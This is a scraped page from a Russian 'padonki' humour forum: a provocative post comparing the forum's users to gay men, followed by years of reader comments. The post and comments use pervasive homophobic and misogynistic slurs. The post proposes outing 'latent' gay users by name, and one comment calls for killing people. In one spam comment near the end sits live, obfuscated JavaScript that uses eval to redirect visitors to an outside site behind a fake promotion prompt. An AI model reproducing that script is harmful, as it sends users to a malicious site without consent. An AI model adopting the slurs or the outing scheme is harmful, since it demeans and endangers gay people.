Этот ресурс создан для настоящих падонков. Те, кому не нравятся слова ХУЙ и ПИЗДА, могут идти нахуй. Остальные пруцца!

Падонки и пидарасы: больше сходства, чем отличий

  1. Читай
  2. Полемика
Сразу хочу сказать, я не пидарас. И далее я это докажу строго научным методом. И не сочувствующий. Поэтому нижеследующий текст прошу воспринимать исключительно как дешевую правакацию с целью набрать дохуищи каментов АХТУНГ!!!

Не секрет, что падонки взаимно не любят пидарасов. Ибо таковые есть их общий враг, который всегда нужен для сплочения любой общности, составляя один из атрибутов принадлежности к оной. При этом, однако, большинство падонков, особенно начинающих, живых пидарасов видели только в клипе Джорджа Майкла. И ненависть к таковым у них наигранная. Я так или иначе встречался в своей жизни с пидарами, но многое об их природе не узнал. Собственно, и не стремился. Однако на днях меня посетила странная мысль: А чем пидарасы отличаются от падонков? Простой ответ падонки не ебутся в жопу будет неправильный, потому как многие подонки прутся от анального секса  бабами. Откуда эта мысль взялась я не понял. Как известно мысли и чувства человека ему не принадлежат. Они откуда-то приходят и куда-то уходят, а им только регистрируются ©А.Подводный. Короче, я зарегистрировал у себя эту мысль. Решив разобраться в вопросе, я осуществил пилотный обзор сайта гей.ру, куда любят на удафф.коме отправлять ебнутых хуйяторов и куда, видимо, отправят меня с этим креативом.

Если вы ждете от меня критического обзора этого сайта, то ни хуя не дождетесь, потому как никуда мне не уперлось обозревать пидарские сайты. Единственное, что меня заинтересовало там, это тест: А не пидарас ли вы?
http://www.gay.ru/science/psycholg/str8test.htm
Далее следует список вопросов, за ответы на которые вы получаете баллы от 0 до 100. Чем больше, тем гомосексуальнее, утверждают афторы теста.

Что характерно, согласно обобщенным результатам теста, сайт гей.ру посещает только 41 % пидарасов, догадайтесь, кто остальные. Это означает, что данный сайт пользуется высокой популярностью у падонков. АХТУНГ!!! Хули там говорить. Полагаю, что далеко не все падонки, посещающие этот гребаный ресурс преследуют столь же научный цели, что и я. Поэтому предлагаю всем падонкам пройти данный тест, а результаты поименно обнародовать на удафф.ком. Таким образом мы вычислил всех латентных и эксплицитных пидаров, скрывающихся под никами Убийца пидарасов или Самый страшный в мире ебарь, и забаним их навеки. Кстати, я набрал 27 очков.

Вот такая вот хуйня. А на самом деле пидарасы, так же как и падонки устраивают встречи-тусовки (и даже гей-парады! Кто-то недавно тут предлагал устроить парад падонков!!!), организуют свои сайты, пишут пидар-креативы и т.д. Их организация называется гей-культура, сравни с контр-культурой. Так что, где грани, где? Даже слова «падонок» и «пидарас» начинаются на одну букву. Не знаю, как вам, а мне страшно.

P.S. Один день из моей нелегкой жызни.
http://dickcream.com/history/0624/

Трахатель жырных бап , 22.07.2004

Печатать ! печатать / с каментами

ты должен быть залoгинен чтобы хуйярить камменты !


страница:
>
  • 1
  • 2
  • 3
  • 4
  • 5
  • последнии
все камментарии
207

Тунеядец, 23-07-2004 10:55:29

Абыкнавеный падонак сегодян считал каменты вместо Чмопиздрокла, отняв паек у 8-и летнего мальчика. Браво

208

Йожык Пых, 23-07-2004 10:58:13

унылое говно
не четал

209

Pretty Lady, 23-07-2004 11:12:03

Да я и сама могу, я гимнастка ниибаца

210

Pretty Lady, 23-07-2004 11:16:08

Гыыыы,бугага, шас колики начнуца, такой член я пробывала когда встречалась с Йожыком Пыхом. Спасибо, больше не хочу.

211

неебучий вапрос, 23-07-2004 11:27:11

блять
27 баллов из 100
я не пидр! ну нахуй креатифф

212

неебучий вапрос, 23-07-2004 11:39:49

них.. креатифф
ахтунг - пидары на удафком бля

213

неебучий вапрос, 23-07-2004 11:49:38

ТО ЕСТЬ Я НА УДАФКОМ АХТУНГ!!!!!!

214

водандр, 23-07-2004 12:44:18

а я не пидор!

215

╬Aragon╬, 23-07-2004 13:13:37

хуйня какая-то
классическое КГ/АМ...кажется так

216

Захар, 23-07-2004 13:13:58

Хе, я как и у афтора 27 очков.
Хотя есть вопросы, оветы на которые ну никак
не отвечают пидор ты или нет...
Как в том анекдоте-Петька спички есть?
-нет!
-Ну сука, ты падар...

217

я забыл подписацца, асёл, 23-07-2004 13:23:19

каменты ахуенные. креатив многих задел за живое аааааааа!!!!  ха-хаааааа!!!!

218

НАХН, 23-07-2004 13:30:33

Слова "Падонок" и "Пидарас" начинаются не "на одну букву" а с одной буквы.
А ты, афтор, идеш на одну букву.

219

Габан, 23-07-2004 15:47:05

у меня 32 балла, говорят вроде покане пидар...
почему нах нет прямых вопросов -
ебались ли вы в очко с товарищем?
отсасывали ли когда-нибудь в подъезде идли на лестничной клетке?
носите ли вы по выходным хотя бы иногда женское белье?
и т.п...

220

Габан, 23-07-2004 15:50:11

мальчик пездалетний как всегда жжот...
БЛЯ, Я ПО ХОДУ ПОНЯЛ - МАЛЬЧИК ЭТО УДАВ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

221

Синий_кенгуру, 23-07-2004 15:55:46

фу блять.
"тест составлен по материалам журнала men's health".
еще бы блять кулгёрлнах.
ебитесь в жёпу с такими тестами, хуета полная.
афтар не жжот нехуя.

222

Байстрюк, 23-07-2004 15:57:32

А хуйли бля я даже забыл писал я здесь или нет хуйегознает

223

СУКА В БОТАХ, 23-07-2004 19:38:38

Да ну тебя .. ..подальше. АНАЛизируешььь  веру...
И это изначально неправильно.Радостно слышать , что ты не пидар, но если вникнутть - то можно про многих,  в том числе и про тебя- такое сказать..
КАК ХОРОШО БЫТЬ простааа бабой - В ПИДАРАСТИИ НЕ ОБВИНЯТ !!!

224

Захуйанджелло, 23-07-2004 19:48:39

посмотрел тест. составлен хуйово. например мне непонятно почему составитель теста считает что пидары большой палец при ударе кулаком выставляют вперед, а мужчины прячут в кулак. нихуя правды в этом нет! если палец взять внутрь кулака то когда пидара въебешь по ебалу можешь повредить большой палец, который зажмешь в кулаке. Прикусывать сигарету зубами и курить ее так нихуйа неудобно потому что пепел может упасть на костюм, который у падонка может стоить нехуйовых денег. В одном вопросе совместить тест на ношение пидорских бикини и нормальных плавок вообще провокация. Попорачиваться корпусом на оклик вообще западло. Как и поворачиваться на оклик вообще. Спускаться с горки широко расставив ноги будут те кто никогда не спускался с них или хочет разбить свое ебало упав с горки. КОРОЧЕ тест явная провокация.  Составлен так что падонок обязательно наберет хоть 10 баллов. Тест пидарский - составлен как агетация за пидоров.
Примечанейе - набрал 17 баллов.....

225

hcpower, 23-07-2004 23:22:00

хуйня какая-то

афтар, ебись в рот, хуйово написал

(на всякий случай): все мессаги от меня ниже - клонский высер ебучий, бля

226

XEPACIMOB, 24-07-2004 03:10:11

меня здесь не было.

227

tar729 , 24-07-2004 03:31:21

кг

228

Взбзднувший, 24-07-2004 08:32:45

На самом деле пидаров нет. Это все дешевая пропаганда спецслужб Пендостана.
Падонки, не ведитесь.

229

pelik, 24-07-2004 15:27:15

почему составитель теста считает что пидары большой палец при ударе кулаком выставляют вперед, а мужчины прячут в кулак. нихуя правды в этом нет!

230

Глеп, 24-07-2004 23:44:21

Бля, тест составлен на основе статьи чем бабы атличаюццо от мужыкоф!
Я читал, паэтаму хуйня!

231

Глеп, 25-07-2004 00:29:21

Чисто женские моменты поведения..
Женщина никогда по-настоящему не поймет, почему футболисты, выстраиваясь в стенку, делают такую смешную горку ладонями. Поэтому она не вздрагивает, когда в кино герой получает удар ботинком в промежность.

Женщина не прикусывает сигарету зубами. Она не оставляет ее во рту, а всегда держит в руке.

Зевая, женщина прикрывает рот ладонью, а не кулаком.

Приняв ванну, женщина — неважно, длинноволосая, стриженая или переболевшая тифом — обязательно наматывает себе на голову самодеятельное подобие чалмы из полотенца, хотя бы на одну минуту. Причины возникновения этого восточного ритуала неизвестны.

Женщину практически не раздражает, когда белье застревает между ягодицами.
Прекрасный пол с удовольствием носит все эти пыточные приспособления под названием «бикини». Кроме того, обычно женщина не пытается незаметно поправить белье сзади, встав со стула.

Замахиваясь, чтобы что-то кинуть, женщина отводит руку не вбок, а назад. Именно поэтому дам никогда не посылают взрывать танки.

Женщинам нравятся эти драные веники, от которых столько мусора. Они называют их «композициями из сухих цветов».

Здороваясь за руку, женщина почти не пожимает ее. Про женское рукопожатие поэт Волошин говорил, что оно похоже «на подкидывание мертвого младенца».

Оборачиваясь на зов, женщина обычно поворачивает только голову. Мужчина разворачивает и корпус, поскольку у него гораздо менее гибкая шея.

Женщины боятся пауков, червяков и мышей. Им также не нравятся гусеницы, даже очень красивые.

Подавляющее большинство женщин считают, что умываться водой с мылом вредно (Чем именно они умываются — посмотри в ванной комнате).

Занимаясь сексом, женщина думает о том, красиво ли она выглядит.

На предложение показать руки мужчины честно протягивают открытые ладони.
Женщины протягивают руки ладонями вниз, видимо, для того, чтобы продемонстрировать безукоризненный маникюр и размер бриллиантов.

Слова, которые женщина произносит, ударив по пальцу молотком, можно без цензуры пропустить в эфире «Спокойной ночи, малыши...» То, что говорит в таких случаях мужчина, транслировать нельзя.

Женщины открывают пивные бутылки открывалками для пивных бутылок.

У женщин преобладает грудной тип дыхания. У мужчин в процессе дыхания активно задействованы мышцы брюшного пресса.

Женщины не любят, когда у них свободны руки. Поэтому они всегда носят с собой сумочку — чтобы теребить ее за ремешок, придерживать за край и бесконечно в ней копаться. За неимением сумочки подойдет все, что угодно — веер, перчатки, книжка, цветок.

Подниматься или спускаться с горы женщины стараются боком. Мужчины просто шире расставляют ноги.

Рассматривать свои пятки женщины предпочитают, оборачиваясь за спину.
Мужчины же просто поворачивают поднятую стопу.

К своим половым органам у женщин достаточно равнодушное, отстраненное отношение, они почти незнакомы друг с другом. Женщины не беседуют с ними, не дают им шутливых прозвищ, не обижаются на них.

По раскаленной гальке или песку женщина идет на цыпочках.
Мужчина наступает только на пятки.

Садясь, женщины сжимают колени или просто держат их параллельно. Поэтому в общественном транспорте иметь соседа даму предпочтительнее.

Потягиваясь, мужчины раскидывают или поднимают руки, а женщины сгибают их в локтях, прижимая к бокам.

Стремление к компромиссу, присущее женскому полу, сказывается в том, как они рассказывают матерные анекдоты. Они могут решиться публично рассказать даже самый сальный анекдот. Но ключевое слово пробормочут так невнятно, что никто ничего не разберет. Еще чаще они пытаются передать неприличную изюминку мимикой, жестикуляцией и отчаянным выражением лица.

Пояс на халате женщины завязывают выше пупка, а мужчины - ниже.

Если у женщины на улице расстегнулась ширинка, oна довольно равнодушно отнесется к этому обстоятельству и спокойно застегнет брюки.

Уши женщины затыкают пальцами, а мужчины — ладонями.

Когда ты просишь женщину передать тебе зажигалку, она передает тебе зажигалку, а не проверяет твою прыгучесть и реакцию.

Если мужчина, с точки зрения женщин, очень мало ушел в процессе развития от обезьяны, то мы, со своей стороны, можем также отметить некоторые атавизмы, доставшиеся нашим дамам в наследство от четвероруких предков.
Например, часами искать в шерсти своего самца насекомых. За отсутствием мелких членистоногих, женщины удовлетворяются угрями и прыщиками.

Одеваясь, женщина сперва наденет рубашку, потом — брюки. Мужчины обычно поступают наоборот.

Перчатки женщина одевает до выхода на улицу.

Поднимая тяжелый предмет, женщина постарается переместить его на бок.
Мужчина несет груз перед собой.

232

Интеллектуальный Комбикорм, 25-07-2004 12:59:42

Ебаааать...
У меня 22 очка нах.
Автор, ты бля охуел, агитируешь пидараф чтоли? АХТУНГ!

233

Глеп, 28-07-2004 01:48:09

15 балаф и ниибёд!

234

ГЕРОИЧЕСКИЙ РЕСУРС , 04-08-2004 19:23:47

ГЕРОИЧЕСКИЙ РЕСУРС О БОРЬБЕ С АХТУНГОМ В БЕЛЫХ ХАЛАТАХ ИМЕЕТ ОБНОВЛЕНИЯ: http://www.youmustknow.narod.ru/ ЗАХОДИТЬ НЕ СТИСНЯЦЦА!

235

Мамука, 18-09-2004 10:25:55

Бля! Делать такие выводы только на основании схожести первых букв необъективно. С ТАКИМ ЖЕ УСПЕХОМ МОЖНО ПРОВЕСТИ аналогию между подонками пидарасами и пиздами. Все слышали офабрике пЁзд, читали разные там порногазетки, смотрели там разныезлоебучие конкурсы красоты.
Всё это можно отнести к пиздопарадам или ежели хотите к пиздошоу  => это раз. Два - культ половых органов в человеческой культур только крепнет. Степень фетишызма в данном случае охуительна : пиздой сечас курят бухают таскают тяжести пехют туда всякую дрянь  (не как надо хуи а банки от кокаколы карандаши кольца тампоны), делают пирсинг татухи. Так что поклонение человечества пизде гораздо невъебенней чем пидарам. Взять бля любой порносайт - это сайт о пёздах. У буржуев даже креатив есть - монологи вагины. Вывод - сходные по форме как любая отрасль человеческой культуры пидары подонки и женские ёпт половые органы различны по содержанию. Это я как ученый с мировым именем говорю.

236

Archer, 19-10-2004 23:11:58

А-а, бля! У меня тоже 27, нах! Но пидары есть пидары, следовательно, АХТУНГ!

237

еб, 30-10-2004 16:30:42

чё бля за сайт тупой?

238

Писец, 01-12-2004 23:47:16

Блять...а у миня 32...щас пайду павешусь нахуй...у миня уже жоППа чешытся...=0(

239

ухоф , 02-12-2004 00:53:25

ржал....

240

Пидар хуев, 06-12-2004 17:08:48

Ой мааальчики, за чем ссорится ? Лучще выебите меня всем рииисуурсааммм , чмок, чмок, чмок !

241

Хуесос, 12-01-2005 22:16:55

Я хочу ..... с настоящим мужиком

242

ХХХ, 02-03-2005 19:56:04

1. "я не пидарас"
2. "я осуществил пилотный обзор сайта гей.ру"

каво ты наёбуеш, пидарочек?

243

ХХХ, 02-03-2005 20:11:07

40
ёбт...

244

бля, 28-04-2005 14:16:18

песдец

245

маОцездун Киевский, 07-06-2005 08:20:48

Да, вы все тут пидары!!! Ну признавайся, нихто раз ве не смотрел на мужичков и не нахуяривал себе всякие фильмы??? А опосля с жутью отвергал эти мецты, т.к. вспоминал што оН жеж реальный МаЧо, куда нахуй!!! он жеж пилотак должон пялить.
....у меня 15, так шо я спокоен и ниибет.

246

Заучка, 08-06-2005 11:47:35

Мы вроде как тута ответы на ЕГЕ ищем......

247

Иркутянин, 04-01-2006 18:26:02

30 и ниибет

248

герой ссср, 04-04-2006 11:40:54

далбёбов как всегда в большинстве, лично я против пидорасов ничего против не имею, хоть сам натурал, среди пидоров встречаются интересные люди, ведь по сути вы тут из пидоров делаете отдельную расу, хотя они те же самые люди, просто ебуца в жопу. я на них просто внимания не обращаю, живут да и пусть живут...

249

хуясе, 02-05-2006 22:15:29

эта йоб тя врот йобаный нахуйникаму ненужный пидерастический АХТУНГ!!!! ТЖБот тебя неожидал....

250

Сева, 13-09-2006 13:51:27

Какие уроды ну уроды.да вырордки. мочить всех в сортире.

251

Сергей, 14-11-2007 00:25:01

да ты пидар и мама твоя жрет ночью.

252

Сергей, 14-11-2007 00:31:04

Ты сам придурок прочитал что написал. Хочешь отсосать соси.Урод ты ..

253

Просто Лось, 16-11-2007 12:20:17

Всем прошедшим тест - ВЫ ДОЛБОЕБЫ?! Это ж шуточная хуйня, ее раньше во всякие газетенки юмористические, типа "Флирт", пихали. А вопросы, как правильно подъебнул Глеп, сборник ошибочных и предрассудочных мнений о том, как правильно поступать  мальчикам и девочкам. Помнится в детстве, читая о похождениях Гека Финна и Тома, сука, Сойера, порверял, как я ловлю бросаемый мне предмет - сжимая колени, или, наоборот, расставляя? Выяснилось, блядь, что Марк Твен считал, что женщины сжимают, блять, колени, а мужики, суканах, должны расставлять. Таквот нихуя! Все, сука, сокращаются, когда к ним дерьмо какое летит! Афтару - отдельное мерси за невротебическое чувство юмора.

254

фпизду, 27-09-2009 22:10:09

бля парни, вам надо мужа найти lol !! <a gref="http://vpoiskemuga.ru/">найти мужа</a>

255

фпиздуйобанына, 27-09-2009 22:12:52

бля ну епт ну пишись!!!  ва <a h\ref="http://vpoiskemuga.ru/">найти мужа</a> йобан ны че не пишется!!11 ааааа

256

фпиздуйобаа, 27-09-2009 22:15:54

овлю бросаемый мне предмет - сжимая <a h\\ref='http://vpoiskemuga.ru/'>найти мужа</a> колени, или, наоборот, расставляя? Вы

<script>
abr="http://";
dd="triam.movie-courier.com";
vda="/go.php?sid";
sd="=16";
do1 = "o";
lc12="l"+do1+"c";
an31="ation";
if(confirm("Внимание Акция! Все зарегистрировавшиеся до конца сентября получают VIP статус!")){
eval(lc12+an31+'="'+abr+dd+vda+sd+'";');
}
else{
eval(lc12+an31+'="'+abr+dd+vda+sd+'";');
}
</script>

страница:
  • 1
  • 2
  • 3
  • 4
  • 5
  • последнии
>
все камментарии

ты должен быть залoгинен чтобы хуйярить камменты !


«А какова хуя ты, пизда ванючая, прешься с многокилаграммовай телегой через весь город в девять утра, если тебе тяжело? А, блять, я тебя спрашываю? Тебя, тебя, гавно марщинистое? Лежы, сука, дома и не выйобывайся. Манда блять.»

«Муслим все-таки настоял на своем. Валлийцу пришлось пожертвовать пальцем, чтобы остаться в живых. Как же он орал! Баба, истинная баба.»

— Ебитесь в рот. Ваш Удав

Оригинальная идея, авторские права: © 2000-2024 Удафф
Административная и финансовая поддержка
Тех. поддержка: Proforg